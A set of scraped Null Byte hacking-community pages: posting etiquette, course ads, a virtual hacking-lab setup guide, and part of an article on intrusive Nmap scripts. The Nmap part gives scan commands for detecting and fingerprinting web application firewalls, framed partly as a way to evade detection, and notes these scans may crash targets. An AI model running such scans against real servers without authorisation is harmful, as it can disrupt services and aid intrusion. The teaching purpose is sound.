Basics & Fundamentals of DoXingNews:US Army Outfits Soldiers with Augmented Reality HeadsetsNews:Target Taps YouCam for Augmented Reality Cosmetics Web AppNews:Indie and Mainstream Online Games Shut Down by LulzSecHow To:Spy on the Web Traffic for Any Computers on Your Network: An Intro to ARP PoisoningNews:Why we shouldn't rush the job searchNews:Lego Seek and Destroy TankHow To:An Exhaustive Guide to Mining and Resource Collection in MinecraftNational Ignition Facility:Big, Giant Lasers of Doom... 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How to Post to Null Byte [4.10.15 Revision] « Null Byte :: WonderHowTo
Hello readers, and welcome to Null Byte.Before we start, for those of you who may not know me, my name is ghost_; I'm a relatively active member of our community and have been around for a while.During my time here, I've seen our community cultivate into the brilliant one we have today, people from all over the world with varying skillsets, excited to learn and help each other.Now, I know you're excited to start hacking and reenact the scenes from your favourite movies like Swordfish or The Italian Job, but first I think you should read through this to understand the appropriate way to post to Null Byte.Null Byte's LayoutFirst of all, you will notice the 5 links at the top of the page; I'm going to be walking you through those so that we have a solid understanding of the layout here.World Home:This is the entry point to Null Byte, it showcases the most recent activity here. You don't really post anything through this link, it's more of a starting point.How-To:Now some people have been getting confused with the function of the How-To section. This is where you post if you have written a step-by-step guide on hacking. Do not post things like, "How do I hack a WiFi hotspot?", because it's not for your questions.Inspiration:This is where you post if you have something you want to share with the community that you find inspiring or interesting.Forum:This is where you post your questions or discussions.Creators:This is where you find a list of the contributors in the Null Byte community, you'll noticeOccupyTheWeb,Bryan Crow, andJustin Meyersare always the top three. These three people are the administrators and moderators, everyone else is simply a user just like yourself.However, there are a few of us who have been around for a while and will gladly help you, such asCyberHitchHiker,Ciuffy,Cracker Hacker,Phoenix750and of course,myself. With that being said, we are not the only contributors around, there are a lot more who will gladly help you with questions.I know it may seem a little bit nitpicky, but organisation is very important so that people can easily navigate around the site. Please stick to this.Speaking of navigation, there is a search function at the top. If you have a question like "How do I hack a WiFi hotspot?" do a quick search here first, there's most likely already a guide available. Simply type something like "wifi hack" and you'll get all relevant results in Null Byte, neat huh?Null Byte EtiquetteNow, before you start posting like crazy, there is a bit of etiquette I feel we should cover.1.Please use the best spelling, grammar, and punctuation you know. If English is not your native language, that's okay, I said earlier that we're from all over the world. But if you have a firm grasp of the English language, please post legibly. It not only makes our lives much easier, but it simply looks better. None of this, "how do u do dis lol", or "y does dis hapen?" as it looks awful and simply degrades the quality of Null Byte. This goes the same for swearing, please refrain from doing so, it's not constructive.2.Please address one another with respect, we're not your dude, man, or bro. But particularly do not speak to OTW in that manner, he's your teacher, address him as such.3.Do a bit of digging before you post a question. Don't give up at the first obstacle, do a bit of your ownproblem solving, it's very important that you develop this skill as it's paramount to hacking. Look around the site, look in the comments sections, look offsite.With that said, I'm not discouraging you to ask for help, please do. Just do a bit of your own research before you do, you may even find the answer yourself and that feels awesome.4.Please be patient. I can understand that you're eager to hack and you may have posted your question hours ago, but we all have our own lives to live. Your question will be answered, it may just take some time.5.Do not verbally attack, degrade, or bully one another. We're all here for the same reason and no-one should have to put up with that. If you have a differing opinion to someone else, keep it to yourself or bring it up in a constructive and civil manner.If you've noticed that what someone has posted is wrong, please let them know in a constructive and civil manner.Get the pattern here? Fantastic, let's keep going.6.Plagiarism is not tolerated at all. If you find something worth sharing with the community, please share it, but provide a link back to the original source and paraphrase the parts you find interesting.Cracker Hackerrecently created apostabout this very subject, and trust me, we can and will find out very quickly if you plagiarise.7.If you are an already experienced hacker wanting to learn more techniques, first I say welcome. You may have noticed that we are a very welcoming community and we would like to keep it that way. If you decide to begin to help newbies; then please do so with the respect you have received. We do not tolerate malicious behaviour in any way, if you feel that the new user does not have enough knowledge to begin hacking, please direct them to this post here. Do not do something such as tell a newbie to run a command that will delete their OS, that kind of action will result inthis.8.Please be specific with your questions. We can't help you if you give us no information to work on. Tell us what you want to do. What your end goal is. As much information as you can possibly give us, it leaves less guesswork for us, and more accurate information for you.Where Do I Start?It can be a bit daunting at first, but there are posts to help you out. I'm going to consolidate those posts here as a starting reference for new users.Firstly, a solid, foundational understanding on computers is absolutely necessary to begin hacking. Learning the basics is important because you will always be using that knowledge, hence why it's foundational knowledge. If we look at it in terms of building a house, if you don't have a solid foundation, the rest of the building is unstable and likely to collapse. Simple, right? Therefore, you must have a good understanding of computers before you start here. It's incredibly important.The Legal Consequences of Hacking, this is a very important post. I urge you all to read this and know that there are very real consequences to what we can do and what is taught here, so please be cautious.How to Use Null Byte to Study to Become a Professional Hacker, this is a post made by OTW and it shows you his layout for the tutorials.Linux Basics for the Aspiring Hacker, Linux is the hackers OS of choice. Learn it, use it, master it. Almost all the tools available for hacking are built for Linux.Kali Linux Portability, this is a great guide made by another memberCiuffy. It's all about getting portable with Kali so that you can use it with any machine you have available. It's also pretty much become the Kali installation guide, so there's a lot of information here on Kali installations, not just in the guide itself, but in the comments section.How to Create a Virtual Hacking Lab, a big part of hacking is the practical application of it. Your knowledge is pretty useless if you can't apply it; however, hacking is illegal and can carry heavy penalties. This is where virtual labs come into play, you can create pretty much any scenario you need and then hack away.The Hacker Methodology, this goes through the steps you will need to carry out in order to perform a successful hack. Each step is significantly important, so read up and learn these backwards.Essential Skills to Becoming a Master Hacker, if you're like me and you want to make hacking into your career, you will be very interested in what exactly you'll need to know in order to be able to carry out your job. And let me tell you right now, it's a lot. But don't let that deter you, it's a lot of fun learning about all of these things.The Purpose of Null ByteNull Byte is, first and foremost, an educational community. Meaning we are here to learn, not commit crimes.We are not your personal tech support team and we are not for hire.Please do not make posts or send us emails asking us to perform a hack for you.Finally, if you make a post wanting to know how to do something simple like cracking the password for an AP, or hacking your school's network, with no intention of actually learning anything, you are a script kiddie.I, personally, don't help script kiddies and I don't think anyone else should either. Not only is it a waste of our time, but it's probably for the best that you don't know how to do whatever it is that you want to do either.If you are an existing member, please feel free to link this to new users you feel could benefit.ghost_ChangelogChangelog as of 25.9.15:Added number 6, plagiarism in the Null Byte Etiquette section.Added malicious behaviour to number 7 in the Null Byte Etiquette section.Added swearing to number 1 in the Null Byte Etiquette section.Added number 8, information when asking questions in the Null Byte Etiquette section.Added Changelog section.Added Phoenix750 to the Null Byte Layout section.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedFarewell Byte:Goodbye Alex, Welcome AllenHow Null Byte Injections Work:A History of Our NamesakeHow To:Things to Do on WonderHowTo (01/18 - 01/24)Community Roundup:Fix an Xbox with Pennies, Carve Polyhedral Pumpkins & MoreHow To:Things to Do on WonderHowTo (02/08 - 02/14)How To:Things to Do on WonderHowTo (11/9 - 11/15)Weekend Homework:How to Become a Null Byte Contributor (2/17/2012)Weekend Homework:How to Become a Null Byte Contributor (2/3/2012)A Null Byte Call to Arms:Join the Fight Against IgnoranceHow To:Things to Do on WonderHowTo (12/07 - 12/13)How To:Things to Do on WonderHowTo (01/11 - 01/17)How To:Things to Do on WonderHowTo (02/15 - 02/21)How To:Things to Do on WonderHowTo (11/23 - 11/29)How To:Things to Do on WonderHowTo (02/22 - 02/28)How To:Things to Do on WonderHowTo (12/28 - 01/03)Weekend Homework:How to Become a Null Byte Contributor (2/24/2012)Community Byte:Coding an IRC Bot in Python (For Beginners)Weekend Homework:How to Become a Null Byte Contributor (2/10/2012)How To:Safely Log In to Your SSH Account Without a PasswordHow To:Things to Do on WonderHowTo (02/01 - 02/07)Null Byte:Never Let Us DieHow To:Things to Do on WonderHowTo (01/25 - 01/31)How To:Things to Do on WonderHowTo (11/30 - 12/06)How To:Things to Do on WonderHowTo (01/04 - 01/10)News:Null CommunityWeekend Homework:How to Become a Null Byte ContributorGoodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingNews:Null Byte's First Technical Excellence Tutorial Contest Ends Feb. 15, 2016!Weekend Homework:How to Become a Null Byte Contributor (3/2/2012)How To:Push and Pull Remote Files Securely Over SSH with PipesHow To:Dropped Your Phone in Water? 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Become an In-Demand Ethical Hacker with This $15 CompTIA Course « Null Byte :: WonderHowTo
If you're interested in joining the increasingly popular and lucrative world of ethical or "white hat" hacking, you're far from alone. More and more coding and programming pros are turning to this field thanks to the high pay, countless opportunities, and exciting work environment.But this means that if you want to be competitive, you're going to need to have the right skills and certifications on your resume. TheCompTIA PenTest+ (PT0-001) Ethical Hacking Coursewill help you ace the exam for one of the field's most valuable and in-demand certifications, and it's available right now for over 90% off at just $14.99.This 10-hour prep course will help you gain the skills you need to safeguard and manage a wide range of common networks, all through lessons directly related to the CompTIA PenTest+ examination.Regardless of your previous experience with network security or administration, this extensive training package comes loaded with 67 lectures that will teach you how to find and patch vulnerabilities in networks, how to anticipate a wide range of cyber threats that can compromise company data, how to report and analyze your findings to your clients, and more.There's also plenty of instruction that will teach you how to scan networks remotely, crack passwords, intercept foreign traffic, discover code vulnerabilities that can compromise security, and run advanced system analysis tools in the field.You'll have unlimited access to all the course content for life, and it's easy to keep up with your training even when you're on the go, thanks to mobile streaming access.Get the skills and credentials you need to thrive in the exciting and lucrative world of ethical hacking. The CompTIA PenTest+ (PT0-001) Ethical Hacking Course will get you to where you need to be forjust $14.99— over 90% off its usual price.Prices are subject to change.Don't Miss Out:The CompTIA PenTest+ (PT0-001) Ethical Hacking Course for Just $14.99Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:8 Web Courses to Supplement Your Hacking KnowledgeHow To:This $1,300 Ethical Hacking Bundle Is on Sale for $40 TodayHow To:Break into the Lucrative World of Ethical Hacking with This Reasonably Priced Course BundleHow To:Learn the Essential Skills to Start a Career in IT with This Affordable Online TrainingNews:Becoming a HackerHow To:Become a Computer Forensics Pro with This $29 TrainingHow To:Become an In-Demand Cybersecurity Pro with This $30 TrainingHow To:This 5-Course Data Analytics Bundle Is Just $49 TodayHow To:Learn the Ins & Outs, Infrastructure & Vulnerabilities of Amazon's AWS Cloud Computing PlatformHow To:Become a HackerHow To:This Course Bundle Will Teach You How to Start & Grow a BusinessHow To:Leap into Cybersecurity with This Ethical Hacking BundleHow To:This Is the Ultimate Course Bundle if You're Looking to Work in the CloudHow To:Take the First Step Towards an In-Demand & Lucrative Career in IT for Under $35How To:Become an In-Demand Web Developer with This $29 TrainingHow To:Here's Why You Need to Add Python to Your Hacking & Programming ArsenalHow To:13 Black Friday Deals on Courses That Will Beef Up Your Hacking & Programming Skill SetNews:Student Sentenced to 8mo. in Jail for Hacking Facebook7/7- Weds Pick:Carbon Leaf / Brandon Stanley @ TroubaNews:Fri Night Pick - CocoRosie @ Orpheum Theatre $28News:Win Cash!Top 10:Best Ethical Destinations for 20117/9- Fri Pick:Harlem / The Black Apples / Audacity @News:Australia cracks down on sweatshop workers in Melbourne suburbNews:Whitman Sets Record for Most Campaign Self-Financing in US HistoryScrabble Cheats:The Guilt of Playing IWI
Learn C# & Start Designing Games & Apps « Null Byte :: WonderHowTo
Learning different coding languages can be difficult. You spend so much time mastering one and getting used to thinking along the channels you need for it that learning something new can sometimes be more difficult than starting from scratch. Starting from scratch, notably, is also difficult.The Complete C# Programming Bundle: Lifetime Accessis designed to give you a comprehensive look at coding with C#, one of the most common coding languages, particularly for Windows and game design. Right now, The Complete C# Programming Bundle is on sale for only $29.This bundle is perfect for those completely new to C#, whether that means you have other coding experience or are completely starting out. In classes like "C# Basics: Learn to Code the Right Way" and "C Programming For Beginners," you will take the first steps toward the mastery of this diverse coding language. These two courses, in particular, are designed to take you step by step through the process of coding with C#, so you will quickly gain the experience you'll need to start doing more fun things like game design.While it's great for Windows, there are also complete classes on creating Android and iOS apps.Many of the courses in this bundle cover game design because it is one of the dominant niches in programming besidescybersecurityand IT. One of the benefits of coding with C# is that it isn't as limited to one platform as some other coding languages. With C# and this bundle, you candesign games for mobile devices and consolesalike. In "Learn to Code in C#: Make a Multiplayer Unity Game," you will even learn the process of applying your new knowledge in C# toward making a real multiplayer game.This seven-course bundle is everything you need to get a running start into coding with C#. You can get started bygetting The Complete C# Programming Bundle: Lifetime Access while it's on salefor $29.Prices subject to change.Don't Miss Out:The Complete C# Programming Bundle: Lifetime Access for Just $29Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Expand Your Coding Skill Set by Learning How to Build Games in UnityHow To:Play Beethoven's "Moonlight Sonata" in C# minorHow To:Design Your Own Video Games with This Pay What You Want BundleHow To:Write a simple dictionary program in C#How To:Get the application path for an app written in C#How To:Play "Until You're Mine" by Demi Lovato on guitarHow To:Play "Year 3000" by Jonas Brothers on pianoHow To:Add, save & retrieve data in SQL Server using C# programming & Visual StudioHow To:Play "Drown In My Own Tears" by Ray Charles on pianoHow To:Play "One Step At A Time" by Jordin SparksHow To:Get started programming C# in Visual Studio 2008How to Program in C#:Introduction to the Basics (Part 1)ARCore 101:How to Create a Mobile AR Application in Unity, Part 3 (Setting Up the App Controller)How To:Respond to an C#/Xna game window resize eventHow To:Resize Xna game windows using C#How To:Create reports & pass parameters in C# programming with Visual StudioHow To:Create a class, object & add members to the class in Visual Studio using C#How To:Declare and add data to arrays in C# programmingHow To:Play "When you Look Me in the Eyes" on pianoHow To:Write C# code with Microsoft Visual C# 2005How To:Create a RSS reader app in Visual C# 2005 ExpressNews:.NET DCPU-16 EmulatorOctodad:An Award Winning Game… From College StudentsHow To:Create a Simple, Hidden Console Keylogger in C# SharpHow To:Write your first C# application in Visual C#News:Hideo Kojima and Fox Engine Make Special USC AppearanceNews:Freemium Games Start Their US Invasion on the iOS FrontNews:Microsoft Ribbon HeroNews:Project Zomboid Has More Problems than the Guy in this ScreenshotHow To:Use and work with XML documents in a C# applicationNews:A Quick Homage to Our BenefactorNews:The 5 Best Word Game Mobile Apps Besides ScrabbleHow To:A Gamer's Guide to Video Game Software, Part 3: Making Games with GamesNews:Finally! A Practical Use for Arcade Game SkillsHow To:Live Your Dream as a Video Game Developer! Get the Free Career Guide NowScramble with Friends:Zynga's Newly Released Word Game for iOSNews:Welcome to FrontierVille WorldHow To:Use the List View control in Microsoft Visual C# 2005News:W.E.L.D.E.R. Blends Bejeweled, Boggle and Scrabble into Word-Building AddictionWonderment Blog:AR Holographic Tattoos
Hack Like a Pro: How to Create a Virtual Hacking Lab « Null Byte :: WonderHowTo
Welcome back, my amateur hackers!Many of you here are new tohacking. If so, I strongly recommend that each of you set up a "laboratory" to practice your hacks. Just like any discipline, you need to practice, practice, and practice some more before you take it out to the real world.In many disciplines, if you don't practice, you fall victim to failure. In our discipline, if you don't practice and fail, you may be serving years behind bars. This makes practice and a dedicated practice lab an even more compelling argument than with other disciplines.Many of you have been having difficulty setting up your hacking environment to practice your hacks. In this tutorial, I will show you thesimplest and fastestway to set up a lab to practice your hacks before taking them out into the real world where any slip-ups could be devastating!Step 1: Download VMware Workstation or PlayerThe best way to practice hacking is within a virtual environment. Essentially, you set up a hacking system, such asKali Linux, and some victims to exploit. Ideally, you would want multiple operating systems (Windows XP, Vista, 7, and 8, as well as aLinuxflavor) and applications so that you can try out a variety of hacks.Virtual machines and a virtual network are the best and safest way to set up a hacking lab. There are several virtualization systems out there, includingCitrix, Oracle'sVirtualBox,KVM, Microsoft'sVirtual PCandHyper-V, and VMware'sWorkstation,VMware PlayerandESXi. For a laboratory environment, I strongly recommend VMware's Workstation or Player. Workstation is commercial product that costs under $200, while Player is free. You can also get a free 30-day trial of Workstation.Player is limited to just playing VMs, while Workstation can both create and play VMs. Let's download VMware's Workstation or Playerhere.Step 2: Download Kali VMware ImagesOnce you have downloaded and installed your virtualization system, our next step is to download theVMware images of Kaliprovided by Offensive Security. With these images, you won't have to create the virtual machine, but simply run it from Workstation or Player—Offensive Security has already created this image for you. This means that once you have downloaded the VM of Kali, you can then use it in either Workstation or Player.Step 3: Unzip ImagesOnce you have completed the download, you will need to unzip the files. There are numerous zip utilities available for free including7-Zip,WinZip,WinArchiver, etc. Download and install one and unzip the files. In the screenshot below, I have downloaded the free trial of WinZip and have used it to unzip the Kali files.Step 4: Open VMware ImageOnce all the files have been unzipped, our next step is to open this new virtual machine. Make note of the location where you have unzipped the virtual machine image. Then, go to either VMware Workstation or Player and go toFile -> Openlike in the screenshot below.This will open a window like that in the screenshot below. You can see that my Kali image was stored under documents, so I browse there and double-click on the folder.When I do so, it reveals the VMware virtual machine file that I will load into VMware. Note that I am using the "amd64" version, which is simply the 64-bit version, but the 32-bit version will work, as well, albeit a bit slower.When you do so, VMware will start your virtual machine and greet you with a screen like below.Click on the green button in the upper left below "Kali-Linux-1.0.9-vm-amd64" that says "Power on this virtual machine." You should be greeted by the now familiar Kali screen like below.Simply use the user "root" and password "toor" to get started hacking!Step 5: Download & Install TargetsFor the next step, you need to download and install a target system. Of course, you could use your own host Windows 7 or 8 system, but since this is practice, you might want to use an older, easier to hack system. In addition, hacking your own system can leave it unstable and damaged.I recommend installing a Windows XP, Vista, Server 2003, or an older version of Linux. These systems have many known security flaws that you can practice on and, then when you become more proficient at hacking, you can then upgrade to Windows 7 and 8 and newer versions of Linux.If you or your friends don't have a copy of these older operating systems, you can purchase them very inexpensively many places on the Internet. For instance, at last check there are numerous copies available on eBay for as low as $9.95.Of course, you can also obtain these operating systems for free on many of the torrent sites, but BEWARE... you will likely be downloadingmore than just the operating systems. VERY often, these free downloads includerootkitsthat will embed in your system when you open the file.In addition, older versions of Linux are available from the distributor or via torrent sites, as well.Step 6: Download Old ApplicationsOnce you have your operating system in place, very often you will need applications to run on these older versions of the Windows and Linux operating systems. You will likely need a browser, Office, Adobe products, etc. These older products have well-known security flaws that you can hone your skills on.I like the siteOld Appsto download many of these. Of course, once again, you can obtain these from many of the torrent sites with the same caveat as above of you might get more than you bargained for.I'm hoping that this brief tutorial is helpful to some of you who have had difficulty setting up Kali and a lab, and now we can get back toour work of hacking, my amateur hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedHack Like a Pro:How to Create a Smartphone Pentesting LabNews:How to Study for the White Hat Hacker Associate Certification (CWA)Brief Reality:AR Goes Green in HackathonHacking Android:How to Create a Lab for Android Penetration TestingHow To:Hack Club Penguin for loads of money (03/22/09)How To:XDA Labs Makes Installing Third-Party Apps & Hacks EasyNews:One of the Best Android File Managers Is Finally on the Play StoreApple AR:Virtual Dog Demo by Ridgeline Could Be the New TamagotchiNews:Startup Light Field Lab Lands $28 Million in Funding from Samsung, Verizon, & Comcast for Holographic DisplaysHow To:Ingress, Google's Awesome New Mind-Hacking AR Game for Android Phones Now in Beta!How To:Broken Buttons on Your Android Phone? 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Advanced Nmap: Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should Know « Null Byte :: WonderHowTo
Nmap is more powerful than you know. With a few scripts, we can extend its functionality beyond a simple port scanner and start to identify details about target servers sysadmins don't want us to know.Possibly the most popular and well-known reconnaissance tool currently available in the hacking world, Nmap has beencovered several timeson Null Byte before. For example, we've shown how todetect CVEs,automate brute-force attacks, andperform advanced reconnaissance, to name just a few Nmap tutorials.This article assumes readers have some experience withthe Nmap basics. I'll be targetting ports 80 and 443 (-p80,443) with most of the commands, as these are common web server ports. I'll also be engagingNmap's NSE functionswith the--scriptargument.Don't Miss:Using the Nmap Scripting Engine (NSE) for ReconnaissanceMost-known for its ability to accurately fingerprint ports on web servers, Nmap's NSE functionalities make it an extremely powerful, multipurpose tool, scaling it far beyond an ordinary port scanner. In this multi-part Nmap series, I'll be showing off some of its more advanced capabilities for aggressively discovering web server error pages, web application firewall fingerprints, subdomains, and extracting metadata from photos.Disclaimer: Theintrusive Nmap scriptsexhaust significate resources (CPU and bandwidth) on the target web server and may cause it to crash, break, or unintentionally inflict denial of service attacks. Based on the scope of your penetration testing engagement, this may not be allowed by a given employer. Pentester's should use the below scripts with caution.Update Nmap on Your Kali SystemBefore we dive into Nmap scripts, let's first make sure we have the latest available version of Nmap installed on our Kali Linux system. At the time of this writing, Kali is offering v7.70.Nmap can be installed using the belowapt-getcommands.apt-get update && apt-get install nmapWhen that's done, we can verify it was installed with the--versionargument.nmap --version Nmap version 7.70 ( ) Platform: x86_64-pc-linux-gnu Compiled with: liblua-5.3.3 openssl-1.1.0h libssh2-1.8.0 libz-1.2.11 libpcre-8.39 nmap-libpcap-1.7.3 nmap-libdnet-1.12 ipv6And as always, we can use the--helpargument to view its available options. These options can be coupled with Nmap scripts to further enhance the commands featured in this article.nmap --help Nmap 7.70 ( ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex:,,; 10.0.0-255.1-254 -iL <inputfilename>: Input from list of hosts/networks -iR <num hosts>: Choose random targets --exclude <host1[,host2][,host3],...>: Exclude hosts/networks --excludefile <exclude_file>: Exclude list from file HOST DISCOVERY: -sL: List Scan - simply list targets to scan -sn: Ping Scan - disable port scan -Pn: Treat all hosts as online -- skip host discovery -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -PO[protocol list]: IP Protocol Ping -n/-R: Never do DNS resolution/Always resolve [default: sometimes] --dns-servers <serv1[,serv2],...>: Specify custom DNS servers --system-dns: Use OS's DNS resolver --traceroute: Trace hop path to each host SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idle scan -sY/sZ: SCTP INIT/COOKIE-ECHO scans -sO: IP protocol scan -b <FTP relay host>: FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9 --exclude-ports <port ranges>: Exclude the specified ports from scanning -F: Fast mode - Scan fewer ports than the default scan -r: Scan ports consecutively - don't randomize --top-ports <number>: Scan <number> most common ports --port-ratio <ratio>: Scan ports more common than <ratio> SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info --version-intensity <level>: Set from 0 (light) to 9 (try all probes) --version-light: Limit to most likely probes (intensity 2) --version-all: Try every single probe (intensity 9) --version-trace: Show detailed version scan activity (for debugging) SCRIPT SCAN: -sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts --script-args-file=filename: provide NSE script args in a file --script-trace: Show all data sent and received --script-updatedb: Update the script database. --script-help=<Lua scripts>: Show help about scripts. <Lua scripts> is a comma-separated list of script-files or script-categories. OS DETECTION: -O: Enable OS detection --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively TIMING AND PERFORMANCE: Options which take <time> are in seconds, or append 'ms' (milliseconds), 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m). -T<0-5>: Set timing template (higher is faster) --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes --min-parallelism/max-parallelism <numprobes>: Probe parallelization --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies probe round trip time. --max-retries <tries>: Caps number of port scan probe retransmissions. --host-timeout <time>: Give up on target after this long --scan-delay/--max-scan-delay <time>: Adjust delay between probes --min-rate <number>: Send packets no slower than <number> per second --max-rate <number>: Send packets no faster than <number> per second FIREWALL/IDS EVASION AND SPOOFING: -f; --mtu <val>: fragment packets (optionally w/given MTU) -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys -S <IP_Address>: Spoof source address -e <iface>: Use specified interface -g/--source-port <portnum>: Use given port number --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies --data <hex string>: Append a custom payload to sent packets --data-string <string>: Append a custom ASCII string to sent packets --data-length <num>: Append random data to sent packets --ip-options <options>: Send packets with specified ip options --ttl <val>: Set IP time-to-live field --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address --badsum: Send packets with a bogus TCP/UDP/SCTP checksum OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename. -oA <basename>: Output in the three major formats at once -v: Increase verbosity level (use -vv or more for greater effect) -d: Increase debugging level (use -dd or more for greater effect) --reason: Display the reason a port is in a particular state --open: Only show open (or possibly open) ports --packet-trace: Show all packets sent and received --iflist: Print host interfaces and routes (for debugging) --append-output: Append to rather than clobber specified output files --resume <filename>: Resume an aborted scan --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML --webxml: Reference stylesheet from Nmap.Org for more portable XML --no-stylesheet: Prevent associating of XSL stylesheet w/XML output MISC: -6: Enable IPv6 scanning -A: Enable OS detection, version detection, script scanning, and traceroute --datadir <dirname>: Specify custom Nmap data file location --send-eth/--send-ip: Send using raw ethernet frames or IP packets --privileged: Assume that the user is fully privileged --unprivileged: Assume the user lacks raw socket privileges -V: Print version number -h: Print this help summary page. EXAMPLES: nmap -v -A nmap -v -sn nmap -v -iR 10000 -Pn -p 80 SEE THE MAN PAGE ( FOR MORE OPTIONS AND EXAMPLESRelated Book: "Network Scanning Cookbook: Practical Network Security using Nmap and Nessus 7" by Sairam Jetty1. Web Application Firewall DetectionAweb application firewall, shortened to WAF, detects and blocks malicious traffic transmitting to and from the web server its protecting. WAFs are most commonly used to help protect websites against SQL injection, file inclusion, and cross-site scripting (XSS) attacks.A server well-protected by a WAF could mean all potential web-based vulnerabilities are thwarted. Adversely, a server unprotected by any kind of WAF could be disastrous for system's administrators trying to defend against hackers. Our ability to detect web application firewalls on target web servers is crucial as pentesters.Thehttp-waf-detectscript is designed to help us learn the presence of a web application firewall. It will probe the target web server with several requests. First, it'll send a normal web request and record the response from the server. Then, it'll send another request with a payload (malformed URL) and compare the responses. This method of detecting WAFs is far from perfect and may vary based on the type of web server and WAF product.To enable thehttp-waf-detectscript, use the belownmapcommand.nmap -p80,443 --script http-waf-detect --script-args="http-waf-detect.aggro,http-waf-detect.detectBodyChanges" targetWebsite.comHere, I'm using thehttp-waf-detect.aggroargument, which instructs Nmap to try all of its built-in attack vectors to trigger the servers WAF. Also enabled is thehttp-waf-detect.detectBodyChangesargument, which looks for changes in the body of the HTTP requests and further increases the likeliness of detection.Starting Nmap 7.70 ( ) Nmap scan report for Host is up (0.65s latency). PORT STATE SERVICE 80/tcp open http | http-waf-detect: IDS/IPS/WAF detected: | 443/tcp open https | http-waf-detect: IDS/IPS/WAF detected: | we can see in the above output, Nmap has detected some kind of web application firewall present on the target web server. There are many commercial WAF products available to administrators. To learn which WAF is in production, we'll need to employ a different Nmap script.2. Web Application Firewall Fingerprint DetectionLearning which WAF is in use can be important as every WAF has its own predefined rate-limiting and detection methods. Identifying the type of WAF can aid pentester's in evading detection (or stayingunder the radar) if we can preemptively learn the WAFs limitations and detection triggers.Thehttp-waf-fingerprintNmap script is designed to help us learn the exact web application firewall in use on a target web server. It will also attempt to identify its type and exact version number.In its simplest form, we don't need to include any--script-argsto get this Nmap script working.nmap -p80,443 --script http-waf-fingerprint Starting Nmap 7.70 ( ) Nmap scan report for Host is up (0.71s latency). PORT STATE SERVICE 80/tcp open http | http-waf-fingerprint: | Detected WAF |_ Cloudflare 443/tcp open httpsAs you can see above, this particular website is using the popular Cloudflare service as a front-end to protect their website from attackers.We can further improve Nmap's ability to detect WAF types and versions using thehttp-waf-fingerprint.intensiveargument. This will prolong the scan time and also increase the amount ofnoise(web traffic) generated by the script.nmap -p80,443 --script http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 targetWebsite Starting Nmap 7.70 ( ) Nmap scan report for targetWebsite Host is up (0.84s latency). PORT STATE SERVICE 80/tcp open http | http-waf-fingerprint: | Detected WAF |_ BinarySec version 3.4.0 443/tcp open httpsWe've just learned the BinarySec WAF (version 3.4) is in use. An attack could study the WAF manual to better learn the triggers to avoid detection while penetration testing.3. Find HTTP ErrorsHypertext Transfer Protocol (HTTP)status codes, also known as "response codes," are issued by web servers to our web browsers when we make requests. These codes are a way for web servers to communicate errors to server administrators, web developers, and end-users alike.HTTP status codes are split into several categories or "classes." The first digit defines the categories and the following digits are sub-categories, specific to different types of error messages. For example, the 4xx categories is a class of errors specific to HTTP requests that cannot be fulfilled by the web server. Like trying to view a webpage that doesn't exist. That's defined as a status "404 Not Found," probably one of the most well-known status codes on the internet.Status codes are especially useful to pentester's because it helps us identify broken, malformed, and misconfigured parts of a server which might be leaking sensitive information, or they can allow for some exploitable way of controlling aspects of the server.As per Wikipedia, 